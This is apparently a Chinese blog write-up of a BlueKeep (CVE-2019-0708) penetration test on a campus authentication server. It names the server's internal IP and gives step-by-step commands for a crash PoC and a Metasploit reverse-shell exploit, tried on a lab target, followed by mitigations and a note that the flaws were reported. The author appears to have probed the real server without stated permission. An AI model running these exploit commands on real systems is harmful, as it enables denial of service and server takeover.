欢迎光临散文网 会员登陆 & 注册

记一次校园网渗透测试

2023-03-03 00:01 作者:悲匠  | 我要投稿

ps:发文前已将漏洞反馈至校园信息中心,菜鸡投稿,如有不对的地方还请各位大佬指正

设备连接校园网跳转到了锐捷校园网认证界面

得到校园网服务器地址:10.25.254.11

通过nmap工具扫描端口发现以下端口开放

发现服务器的3389端口开放,推测3389端口可能存在 cve-2019-0708漏洞

利用msf工具进行扫描,发现服务器确实存在该漏洞,通过该漏洞我们可以获取服务器控制权或对服务器发起蓝屏攻击,使服务器瘫痪,或获取服务器shell。

1.对服务器发动蓝屏攻击(本次攻击未攻击校园网服务器,搭建了相同环境的靶机进行测试)

使用漏洞利用工具:git clone https://github.com/n1xbyte/CVE-2019-0708.git

下载完后使用命令 crashpoc.py 192.168.1.108 64 //crashpoc.py 目标ip

运行工具后靶机蓝屏

2.利用该漏洞获取目标shell

使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce漏洞模块

输入命令use exploit/windows/rdp/cve_2019_0708_bluekeep_rce


设置目标:输入命令set rhosts 192.168.1.108

使用payload:输入命令set payload windows/x64/meterpreter/reverse_tcp

设置主机架构:set target 2


执行,获取服务器shell

获取服务器shell后就可以为所欲为了,校园网认证服务器开放的其它端口也存在一些漏洞,目前已将漏洞反馈至校园信息中心,本次渗透未影响服务器正常运行


解决方案:

1.在运行受支持版本的 Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的系统上启用网络级身份验证 (NLA)

2.在企业边界防火墙处阻止 TCP 端口 3389


记一次校园网渗透测试的评论 (共 条)

分享到微博请遵守国家法律